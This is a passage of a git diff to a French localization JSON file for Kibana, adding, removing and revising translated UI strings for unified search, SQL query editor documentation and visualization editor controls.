Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min FROM emp\n```\n\n- MIN sur un champ de type texte ou mot-clé est traduit en FIRST/FIRST_VALUE et ne peut donc pas être utilisé dans la clause HAVING.\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.moduloOperator.markdown": "### Modulo or remainder(%)\n```\nSELECT 5 % 2 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.multiplyOperator.markdown": "### Multiply (*)\n```\nSELECT 2 * 3 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.negateOperator.markdown": "### Negate (unary -)\n```\nSELECT - 1 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.notOperator.markdown": "### NOT\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE NOT emp_no = 10000 LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.nullNotNull.markdown": "### IS NULL/IS NOT NULL\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no IS NOT NULL AND gender IS NULL\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.nullSafeEquality.markdown": "### Null safe equality:\n```\nSELECT 'elastic' <=> null AS \"equals\"\n\n égal\n---------------\nfaux\n```\n```\nSELECT null <=> null AS \"equals\"\n\n égal\n---------------\nvrai\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.orOperator.markdown": "### OR\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no < 10003 OR emp_no = 10005 ORDER BY emp_no LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.percentileFunction.markdown": "### PERCENTILE\nRetourne le centile n (représenté par le paramètre numeric_exp) des valeurs en entrée dans le champ field_name.\n\n```\nPERCENTILE(\n field_name, \n percentile[, \n method[, \n method_parameter]])\n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. 
Sinon, la fonction ignore les valeurs nulles dans ce champ.\n- centile : expression numérique (doit être une constante et ne doit pas être basé sur un champ). Si la valeur est nulle, la fonction renvoie une valeur nulle.\n- method : chaîne littérale facultative pour l'algorithme de centile. Valeurs possibles : tdigest ou hdr. La valeur par défaut est tdigest.\n- method_parameter : numérique littéral facultatif qui configure l'algorithme de centile. Configure la compression pour tdigest ou number_of_significant_value_digits pour hdr. La valeur par défaut est la même que celle de l'algorithme de sauvegarde.\n\n```\nSELECT\n languages,\n PERCENTILE(salary, 97.3, 'tdigest', 100.0) AS \"97.3_TDigest\",\n PERCENTILE(salary, 97.3, 'hdr', 3) AS \"97.3_HDR\"\nFROM emp\nGROUP BY languages\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.percentileRankFunction.markdown": "### PERCENTILE_RANK\nRetourne le rang centile n (représenté par le paramètre numeric_exp) des valeurs en entrée dans le champ field_name.\n\n```\nPERCENTILE_RANK(\n field_name, \n value[, \n method[, \n method_parameter]]) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n- centile : expression numérique (doit être une constante et ne doit pas être basé sur un champ). Si la valeur est nulle, la fonction renvoie une valeur nulle.\n- method : chaîne littérale facultative pour l'algorithme de centile. Valeurs possibles : tdigest ou hdr. La valeur par défaut est tdigest.\n- method_parameter : numérique littéral facultatif qui configure l'algorithme de centile. Configure la compression pour tdigest ou number_of_significant_value_digits pour hdr. 
La valeur par défaut est la même que celle de l'algorithme de sauvegarde.\n\n```\nSELECT\n languages,\n ROUND(PERCENTILE_RANK(salary, 65000, 'tdigest', 100.0), 2) AS \"rank_TDigest\",\n ROUND(PERCENTILE_RANK(salary, 65000, 'hdr', 3), 2) AS \"rank_HDR\"\nFROM emp\nGROUP BY languages\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.skewnessFunction.markdown": "### SKEWNESS\nQuantifier la distribution asymétrique des valeurs en entrée dans le champ field_name.\n\n```\nSKEWNESS(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, SKEWNESS(salary) AS s FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.stsdevpopFunction.markdown": "### STDDEV_POP\nRetourne l'écart type de population des valeurs en entrée dans le champ field_name.\n\n```\nSTDDEV_POP(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, STDDEV_POP(salary) AS stddev FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.stsdevsampFunction.markdown": "### STDDEV_SAMP\nRetourne l'écart type de l'échantillon des valeurs en entrée dans le champ field_name.\n\n```\nSTDDEV_SAMP(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. 
Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, STDDEV_SAMP(salary) AS stddev FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.subtractOperator.markdown": "### Subtract (infix -)\n```\nSELECT 1 - 1 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.sumFunction.markdown": "### SUM\nRetourne la somme des valeurs en entrée dans le champ field_name.\n\n```\nSUM(field_name) \n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT SUM(salary) AS sum FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.sumofsquaresFunction.markdown": "### SUM_OF_SQUARES\nRetourne la somme des carrés des valeurs en entrée dans le champ field_name.\n\n```\nSUM_OF_SQUARES(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, SUM_OF_SQUARES(salary) AS sumsq\n FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.varpopFunction.markdown": "### VAR_POP\nRetourne la variance de population des valeurs en entrée dans le champ field_name.\n\n```\nVAR_POP(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, VAR_POP(salary) AS varpop FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.varsampFunction.markdown": "### VAR_SAMP\nRetourne la variance de l'échantillon de valeurs en entrée dans le champ field_name.\n\n```\nVAR_SAMP(field_name) \n```\n- field_name : champ numérique. 
Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, VAR_SAMP(salary) AS varsamp FROM emp\n```\n ", "unifiedSearch.filter.applyFilterActionTitle": "Appliquer le filtre à la vue en cours", "unifiedSearch.filter.applyFilters.popupHeader": "Sélectionner les filtres à appliquer", "unifiedSearch.filter.applyFiltersPopup.cancelButtonLabel": "Annuler", @@ -5783,13 +5042,10 @@ "unifiedSearch.filter.filterBar.enableFilterButtonLabel": "Réactiver", "unifiedSearch.filter.filterBar.excludeFilterButtonLabel": "Exclure les résultats", "unifiedSearch.filter.filterBar.filterItemBadgeAriaLabel": "Actions de filtrage", - "unifiedSearch.filter.filterBar.filterItemBadgeIconAriaLabel": "Supprimer {filter}", "unifiedSearch.filter.filterBar.includeFilterButtonLabel": "Inclure les résultats", "unifiedSearch.filter.filterBar.indexPatternSelectPlaceholder": "Sélectionner une vue de données", "unifiedSearch.filter.filterBar.invalidDateFormatProvidedErrorMessage": "Format de date non valide fourni", - "unifiedSearch.filter.filterBar.labelErrorInfo": "Modèle d'indexation {indexPattern} introuvable", "unifiedSearch.filter.filterBar.labelErrorText": "Erreur", - "unifiedSearch.filter.filterBar.labelWarningInfo": "Le champ {fieldName} n'existe pas dans la vue en cours.", "unifiedSearch.filter.filterBar.labelWarningText": "Avertissement", "unifiedSearch.filter.filterBar.negatedFilterPrefix": "NON ", "unifiedSearch.filter.filterBar.pinFilterButtonLabel": "Épingler dans toutes les applications", 
@@ -5799,7 +5055,7 @@
 "unifiedSearch.filter.filterEditor.addFilterPopupTitle": "Ajouter un filtre",
 "unifiedSearch.filter.filterEditor.cancelButtonLabel": "Annuler",
 "unifiedSearch.filter.filterEditor.createCustomLabelInputLabel": "Étiquette personnalisée",
- "unifiedSearch.filter.filterEditor.createCustomLabelSwitchLabel": "Créer une étiquette personnalisée ?",
+ "unifiedSearch.filter.filterEditor.createCustomLabelSwitchLabel": "Créer une étiquette personnalisée ?",
 "unifiedSearch.filter.filterEditor.dateViewSelectLabel": "Vue de données",
 "unifiedSearch.filter.filterEditor.doesNotExistOperatorOptionLabel": "n'existe pas",
 "unifiedSearch.filter.filterEditor.editFilterPopupTitle": "Modifier le filtre",
@@ -5845,44 +5101,94 @@
 "unifiedSearch.filter.options.saveCurrentFilterSetLabel": "Enregistrer la requête enregistrée en cours",
 "unifiedSearch.filter.options.saveFilterSetLabel": "Enregistrer la requête enregistrée",
 "unifiedSearch.filter.options.unpinAllFiltersButtonLabel": "Tout désépingler",
- "unifiedSearch.kueryAutocomplete.andOperatorDescription": "Nécessite que {bothArguments} soient ''vrai''.",
 "unifiedSearch.kueryAutocomplete.andOperatorDescription.bothArgumentsText": "les deux arguments",
- "unifiedSearch.kueryAutocomplete.equalOperatorDescription": "{equals} une certaine valeur",
- "unifiedSearch.kueryAutocomplete.equalOperatorDescription.equalsText": "égale",
- "unifiedSearch.kueryAutocomplete.existOperatorDescription": "{exists} sous un certain format",
+ "unifiedSearch.kueryAutocomplete.equalOperatorDescription.equalsText": "égal",
 "unifiedSearch.kueryAutocomplete.existOperatorDescription.existsText": "existe",
- "unifiedSearch.kueryAutocomplete.greaterThanOperatorDescription": "est {greaterThan} une certaine valeur",
 "unifiedSearch.kueryAutocomplete.greaterThanOperatorDescription.greaterThanText": "supérieur à",
- "unifiedSearch.kueryAutocomplete.greaterThanOrEqualOperatorDescription": "est {greaterThanOrEqualTo} une certaine valeur",
 "unifiedSearch.kueryAutocomplete.greaterThanOrEqualOperatorDescription.greaterThanOrEqualToText": "supérieur ou égal à",
- "unifiedSearch.kueryAutocomplete.lessThanOperatorDescription": "est {lessThan} une certaine valeur",
 "unifiedSearch.kueryAutocomplete.lessThanOperatorDescription.lessThanText": "inférieur à",
- "unifiedSearch.kueryAutocomplete.lessThanOrEqualOperatorDescription": "est {lessThanOrEqualTo} une certaine valeur",
 "unifiedSearch.kueryAutocomplete.lessThanOrEqualOperatorDescription.lessThanOrEqualToText": "inférieur ou égal à",
- "unifiedSearch.kueryAutocomplete.orOperatorDescription": "Nécessite qu’{oneOrMoreArguments} soit ''vrai''.",
"unifiedSearch.kueryAutocomplete.orOperatorDescription.oneOrMoreArgumentsText": "au moins un argument", "unifiedSearch.noDataPopover.content": "Cette plage temporelle ne contient pas de données. Étendez ou ajustez la plage temporelle pour obtenir plus de champs et pouvoir créer des graphiques.", "unifiedSearch.noDataPopover.dismissAction": "Ne plus afficher", "unifiedSearch.noDataPopover.subtitle": "Conseil", "unifiedSearch.noDataPopover.title": "Ensemble de données vide", "unifiedSearch.query.queryBar.clearInputLabel": "Effacer l'entrée", - "unifiedSearch.query.queryBar.comboboxAriaLabel": "Rechercher et filtrer la page {pageType}", "unifiedSearch.query.queryBar.indexPattern.addFieldButton": "Ajouter un champ à cette vue de données", "unifiedSearch.query.queryBar.indexPattern.addNewDataView": "Créer une vue de données", + "unifiedSearch.query.queryBar.indexPattern.dataViewsLabel": "Vues de données", "unifiedSearch.query.queryBar.indexPattern.findDataView": "Rechercher une vue de données", "unifiedSearch.query.queryBar.indexPattern.findFilterSet": "Rechercher une requête enregistrée", "unifiedSearch.query.queryBar.indexPattern.manageFieldButton": "Gérer cette vue de données", + "unifiedSearch.query.queryBar.indexPattern.textBasedLangSwitchWarning": "Un changement de vue de données supprime la requête SQL en cours. Sauvegardez cette recherche pour ne pas perdre de travail.", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesLabel": "Langages de requête à base de texte", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesTransitionModalBody": "Un changement de vue de données supprime la requête SQL en cours. 
Sauvegardez cette recherche pour ne pas perdre de travail.", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesTransitionModalCloseButton": "Basculer sans sauvegarder", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesTransitionModalDismissButton": "Ne plus afficher cet avertissement", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesTransitionModalSaveButton": "Sauvegarder et basculer", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesTransitionModalTitle": "Votre requête sera supprimée", "unifiedSearch.query.queryBar.kqlLanguageName": "KQL", "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoDocLinkText": "documents", "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoOptOutText": "Ne plus afficher", - "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoText": "Il semblerait que votre requête porte sur un champ imbriqué. Selon le résultat visé, il existe plusieurs façons de construire une syntaxe KQL pour des requêtes imbriquées. Apprenez-en plus avec notre {link}.", - "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoTitle": "Syntaxe de requête imbriquée KQL", + "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoTitle": "Syntaxe de requête imbriquée KQL", "unifiedSearch.query.queryBar.luceneLanguageName": "Lucene", - "unifiedSearch.query.queryBar.searchInputAriaLabel": "Commencer à taper pour rechercher et filtrer la page {pageType}", - "unifiedSearch.query.queryBar.searchInputPlaceholder": "Filtrer vos données à l'aide de la syntaxe {language}", "unifiedSearch.query.queryBar.searchInputPlaceholderForText": "Filtrer vos données", "unifiedSearch.query.queryBar.syntaxOptionsTitle": "Options de syntaxe", + "unifiedSearch.query.textBasedLanguagesEditor.aggregateFunctions": "Fonctions agrégées", + "unifiedSearch.query.textBasedLanguagesEditor.aggregateFunctionsDocumentationDescription": "Fonctions permettant de calculer un résultat unique à partir d'un ensemble de valeurs d'entrée. 
Elasticsearch SQL ne prend en charge les fonctions agrégées que parallèlement au regroupement (implicite ou explicite).", + "unifiedSearch.query.textBasedLanguagesEditor.comparisonOperators": "Opérateurs de comparaison", + "unifiedSearch.query.textBasedLanguagesEditor.comparisonOperatorsDocumentationDescription": "Opérateur booléen pour une comparaison par rapport à une ou plusieurs expressions.", + "unifiedSearch.query.textBasedLanguagesEditor.disableWordWrapLabel": "Désactiver le renvoi à la ligne des mots", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.AddOperator": "Ajouter", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.AndOperator": "AND", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.averageFunction": "Moyenne", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.between": "Entre", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.comparison": "Comparaison", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countAllFunction": "Count (All)", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countDistinctFunction": "Count (Distinct)", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countFunction": "Décompte", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.divideOperator": "Divide", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.equality": "Equality", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.firstFunction": "First / First_value", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.inequality": "Inequality", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.inOperator": "IN", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.kurtosisFunction": "Kurtosis", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.lastFunction": "Last / Last_value", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.madFunction": "Mad", + 
"unifiedSearch.query.textBasedLanguagesEditor.documentation.maxFunction": "Max.", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.minFunction": "Min.", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.moduloOperator": "Modulo or remainder", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.multiplyOperator": "Multiplier", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.negateOperator": "Negate", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.NotOperator": "NON", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.nullNotNull": "IS NULL et IS NOT NULL", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.nullSafeEquality": "Null safe equality (<=>)", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.OrOperator": "OR", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.percentileFunction": "Centile", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.percentileRankFunction": "Rang centile", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.searchPlaceholder": "Recherche", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.skewnessFunction": "Skewness", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.stsdevpopFunction": "STDDEV_POP", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.stsdevsampFunction": "STDDEV_SAMP", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.SubtractOperator": "Subtract", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.sumFunction": "Somme", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.sumofsquaresFunction": "Sum of squares", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.varpopFunction": "VAR_POP", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.varsampFunction": "VAR_SAMP", + "unifiedSearch.query.textBasedLanguagesEditor.documentationLabel": "Documentation", + 
"unifiedSearch.query.textBasedLanguagesEditor.EnableWordWrapLabel": "Activer le renvoi à la ligne des mots", + "unifiedSearch.query.textBasedLanguagesEditor.errorsTitle": "Erreurs", + "unifiedSearch.query.textBasedLanguagesEditor.expandTooltip": "Développer l’éditeur de requête", + "unifiedSearch.query.textBasedLanguagesEditor.howItWorks": "Fonctionnement", + "unifiedSearch.query.textBasedLanguagesEditor.logicalOperators": "Opérateurs logiques", + "unifiedSearch.query.textBasedLanguagesEditor.logicalOperatorsDocumentationDescription": "Opérateur booléen permettant d'évaluer une ou deux expressions.", + "unifiedSearch.query.textBasedLanguagesEditor.mathOperators": "Opérateurs mathématiques", + "unifiedSearch.query.textBasedLanguagesEditor.mathOperatorsDocumentationDescription": "Effectuer des opérations mathématiques affectant une ou deux valeurs. Le résultat est une valeur de type numérique.", + "unifiedSearch.query.textBasedLanguagesEditor.MinimizeEditor": "Réduire l'éditeur", + "unifiedSearch.query.textBasedLanguagesEditor.minimizeTooltip": "Réduire l’éditeur de requête", + "unifiedSearch.query.textBasedLanguagesEditor.runQuery": "Exécuter la requête", "unifiedSearch.queryBarTopRow.submitButton.refresh": "Actualiser la requête", + "unifiedSearch.queryBarTopRow.submitButton.run": "Exécuter la requête", "unifiedSearch.queryBarTopRow.submitButton.update": "Nécessite une mise à jour", "unifiedSearch.search.searchBar.savedQuery": "Requête enregistrée", "unifiedSearch.search.searchBar.savedQueryDescriptionText": "Enregistrez le texte et les filtres de la requête que vous souhaitez réutiliser.", 
@@ -5897,33 +5203,55 @@
 "unifiedSearch.search.searchBar.savedQueryPopoverApplyFilterSetLabel": "Appliquer la requête enregistrée",
 "unifiedSearch.search.searchBar.savedQueryPopoverConfirmDeletionCancelButtonText": "Annuler",
 "unifiedSearch.search.searchBar.savedQueryPopoverConfirmDeletionConfirmButtonText": "Supprimer",
- "unifiedSearch.search.searchBar.savedQueryPopoverConfirmDeletionTitle": "Supprimer \"{savedQueryName}\" ?",
 "unifiedSearch.search.searchBar.savedQueryPopoverReplaceFilterSetLabel": "Remplacer par la requête enregistrée sélectionnée",
 "unifiedSearch.search.searchBar.savedQueryPopoverSaveAsNewButtonAriaLabel": "Enregistrer en tant que nouvelle requête enregistrée",
 "unifiedSearch.search.searchBar.savedQueryPopoverSaveAsNewButtonText": "Enregistrer en tant que nouvelle",
- "unifiedSearch.search.searchBar.savedQueryPopoverSaveChangesButtonAriaLabel": "Enregistrer les modifications apportées à {title}",
 "unifiedSearch.search.searchBar.savedQueryPopoverSaveChangesButtonText": "Enregistrer les modifications",
- "unifiedSearch.search.unableToGetSavedQueryToastTitle": "Impossible de charger la requête enregistrée {savedQueryId}",
 "unifiedSearch.switchLanguage.buttonText": "Bouton de changement de langue.",
- "utils.filename.pathWarning": "Le chemin est peut-être incorrectement formé ; vérifiez la valeur",
- "utils.filename.wildcardWarning": "l'utilisation de caractères génériques dans les chemins de fichier peut affecter les performances du point de terminaison",
- "visDefaultEditor.advancedToggle.advancedLinkLabel": "Avancé",
+ "unifiedSearch.triggers.updateFilterReferencesTrigger": "Mettre à jour les références de filtre",
+ "unifiedSearch.triggers.updateFilterReferencesTriggerDescription": "Mettre à jour les références de filtre",
 "visDefaultEditor.agg.disableAggButtonTooltip": "Désactiver l'agrégation {aggTitle} de {schemaTitle}",
 "visDefaultEditor.agg.enableAggButtonTooltip": "Activer l'agrégation {aggTitle} de {schemaTitle}",
"visDefaultEditor.agg.errorsAriaLabel": "L'agrégation {aggTitle} de {schemaTitle} présente des erreurs.", "visDefaultEditor.agg.modifyPriorityButtonTooltip": "Modifier la priorité de l'agrégation {aggTitle} de {schemaTitle} en la faisant glisser", "visDefaultEditor.agg.removeDimensionButtonTooltip": "Supprimer l'agrégation {aggTitle} de {schemaTitle}", "visDefaultEditor.agg.toggleEditorButtonAriaLabel": "Activer/Désactiver l'éditeur {schema}", - "visDefaultEditor.aggAdd.addButtonLabel": "Ajouter", "visDefaultEditor.aggAdd.addGroupButtonLabel": "Ajouter {groupNameLabel}", "visDefaultEditor.aggAdd.addSubGroupButtonLabel": "Ajouter sous-{groupNameLabel}", - "visDefaultEditor.aggAdd.bucketLabel": "compartiment", "visDefaultEditor.aggAdd.maxBuckets": "Nombre maximal de {groupNameLabel} atteint", - "visDefaultEditor.aggAdd.metricLabel": "indicateur", "visDefaultEditor.aggParams.errors.aggWrongRunOrderErrorMessage": "Les agrégations \"{schema}\" doivent s'exécuter avant tous les autres compartiments.", - "visDefaultEditor.aggSelect.aggregationLabel": "Agrégation", "visDefaultEditor.aggSelect.helpLinkLabel": "Aide {aggTitle}", "visDefaultEditor.aggSelect.noCompatibleAggsDescription": "Le modèle d'indexation {indexPatternTitle} ne possède pas de champs regroupables.", + "visDefaultEditor.controls.dateRanges.removeRangeButtonAriaLabel": "Supprimer la plage allant de {from} à {to}", + "visDefaultEditor.controls.definiteMetricLabel": "Indicateur : {metric}", + "visDefaultEditor.controls.field.fieldIsNotExists": "Le champ \"{fieldParameter}\" associé à cet objet n'existe plus dans le modèle d'indexation. Veuillez utiliser un autre champ.", + "visDefaultEditor.controls.field.invalidFieldForAggregation": "Le champ enregistré \"{fieldParameter}\" du modèle d'indexation \"{indexPatternTitle}\" n'est pas valide pour une utilisation avec cette agrégation. 
Veuillez sélectionner un nouveau champ.", + "visDefaultEditor.controls.field.noCompatibleFieldsDescription": "Le modèle d'indexation {indexPatternTitle} ne contient aucun des types de champs compatibles suivants : {fieldTypes}.", + "visDefaultEditor.controls.filters.definiteFilterLabel": "Étiquette du filtre {index}", + "visDefaultEditor.controls.filters.filterLabel": "Filtre {index}", + "visDefaultEditor.controls.ipRanges.cidrMaskAriaLabel": "Masque CIDR : {mask}", + "visDefaultEditor.controls.ipRanges.ipRangeFromAriaLabel": "Début de la plage d’IP : {value}", + "visDefaultEditor.controls.ipRanges.ipRangeToAriaLabel": "Fin de la plage d’IP : {value}", + "visDefaultEditor.controls.ipRanges.removeCidrMaskButtonAriaLabel": "Supprimer la valeur du masque CIDR de {mask}", + "visDefaultEditor.controls.ipRanges.removeRangeAriaLabel": "Supprimer la plage allant de {from} à {to}", + "visDefaultEditor.controls.maxBars.maxBarsHelpText": "Les intervalles seront sélectionnés automatiquement en fonction des données disponibles. 
Le nombre maximal de barres ne peut jamais être supérieur à la valeur {histogramMaxBars} des paramètres avancés.", + "visDefaultEditor.controls.numberInterval.minimumIntervalTooltip": "L'intervalle sera scalé automatiquement si la valeur fournie crée plus de compartiments que ce qui est spécifié par la valeur {histogramMaxBars} dans les paramètres avancés.", + "visDefaultEditor.controls.numberList.addUnitButtonLabel": "Ajouter {unitName}", + "visDefaultEditor.controls.numberList.invalidRangeErrorMessage": "La valeur doit être comprise dans la plage allant de {min} à {max}.", + "visDefaultEditor.controls.numberList.removeUnitButtonAriaLabel": "Supprimer la valeur de rang de {value}", + "visDefaultEditor.controls.ranges.removeRangeButtonAriaLabel": "Supprimer la plage allant de {from} à {to}", + "visDefaultEditor.controls.timeInterval.scaledHelpText": "Actuellement scalé à {bucketDescription}", + "visDefaultEditor.editorConfig.dateHistogram.customInterval.helpText": "Doit être un multiple de l'intervalle de configuration : {interval}.", + "visDefaultEditor.editorConfig.histogram.interval.helpText": "Doit être un multiple de l'intervalle de configuration : {interval}.", + "visDefaultEditor.metrics.wrongLastBucketTypeErrorMessage": "La dernière agrégation de compartiments doit être \"Histogramme de date\" ou \"Histogramme\" lorsque vous utilisez l'agrégation d'indicateurs \"{type}\".", + "visDefaultEditor.options.rangeErrorMessage": "Les valeurs doivent être comprises entre {min} et {max}, inclus.", + "visDefaultEditor.sidebar.indexPatternAriaLabel": "Modèle d'indexation : {title}", + "visDefaultEditor.sidebar.savedSearch.titleAriaLabel": "Recherche enregistrée : {title}", + "visDefaultEditor.advancedToggle.advancedLinkLabel": "Avancé", + "visDefaultEditor.aggAdd.addButtonLabel": "Ajouter", + "visDefaultEditor.aggAdd.bucketLabel": "compartiment", + "visDefaultEditor.aggAdd.metricLabel": "indicateur", + "visDefaultEditor.aggSelect.aggregationLabel": "Agrégation", 
"visDefaultEditor.aggSelect.selectAggPlaceholder": "Choisir une agrégation",
 "visDefaultEditor.aggSelect.subAggregationLabel": "Sous-agrégation",
 "visDefaultEditor.buckets.mustHaveBucketErrorMessage": "Ajoutez un compartiment avec une agrégation Histogramme de date ou Histogramme.",
@@ -5938,9 +5266,7 @@
 "visDefaultEditor.controls.dateRanges.addRangeButtonLabel": "Ajouter une plage",
 "visDefaultEditor.controls.dateRanges.errorMessage": "Chaque plage doit avoir au moins une date valide.",
 "visDefaultEditor.controls.dateRanges.fromColumnLabel": "De",
- "visDefaultEditor.controls.dateRanges.removeRangeButtonAriaLabel": "Supprimer la plage allant de {from} à {to}",
- "visDefaultEditor.controls.dateRanges.toColumnLabel": "Au",
- "visDefaultEditor.controls.definiteMetricLabel": "Indicateur : {metric}",
+ "visDefaultEditor.controls.dateRanges.toColumnLabel": "À",
 "visDefaultEditor.controls.dotSizeRatioHelpText": "Remplacez le rapport du rayon du plus petit point par le plus grand point.",
 "visDefaultEditor.controls.dotSizeRatioLabel": "Rapport de taille de point",
 "visDefaultEditor.controls.dropPartialBucketsLabel": "Abandonner les compartiments partiels",
@@ -5950,55 +5276,40 @@ "visDefaultEditor.controls.extendedBounds.minLabel": "Min.", "visDefaultEditor.controls.extendedBoundsLabel": "Étendre les limites", "visDefaultEditor.controls.extendedBoundsTooltip": "Le minimum et le maximum ne filtrent pas de résultats, mais étendent plutôt les limites de l'ensemble de résultats.", - "visDefaultEditor.controls.field.fieldIsNotExists": "Le champ \"{fieldParameter}\" associé à cet objet n'existe plus dans le modèle d'indexation. Veuillez utiliser un autre champ.", "visDefaultEditor.controls.field.fieldLabel": "Champ", - "visDefaultEditor.controls.field.invalidFieldForAggregation": "Le champ enregistré \"{fieldParameter}\" du modèle d'indexation \"{indexPatternTitle}\" n'est pas valide pour une utilisation avec cette agrégation. Veuillez sélectionner un nouveau champ.", - "visDefaultEditor.controls.field.noCompatibleFieldsDescription": "Le modèle d'indexation {indexPatternTitle} ne contient aucun des types de champs compatibles suivants : {fieldTypes}.", "visDefaultEditor.controls.field.selectFieldPlaceholder": "Sélectionner un champ", "visDefaultEditor.controls.filters.addFilterButtonLabel": "Ajouter un filtre", - "visDefaultEditor.controls.filters.definiteFilterLabel": "Étiquette du filtre {index}", - "visDefaultEditor.controls.filters.filterLabel": "Filtre {index}", "visDefaultEditor.controls.filters.labelPlaceholder": "Étiquette", "visDefaultEditor.controls.filters.removeFilterButtonAriaLabel": "Supprimer ce filtre", "visDefaultEditor.controls.filters.toggleFilterButtonAriaLabel": "Activer/Désactiver l'étiquette du filtre", "visDefaultEditor.controls.includeExclude.addUnitButtonLabel": "Ajouter une valeur", "visDefaultEditor.controls.ipRanges.addRangeButtonLabel": "Ajouter une plage", - "visDefaultEditor.controls.ipRanges.cidrMaskAriaLabel": "Masque CIDR : {mask}", - "visDefaultEditor.controls.ipRanges.cidrMasksButtonLabel": "Masques CIDR", + "visDefaultEditor.controls.ipRanges.cidrMasksButtonLabel": "Masques CIDR", 
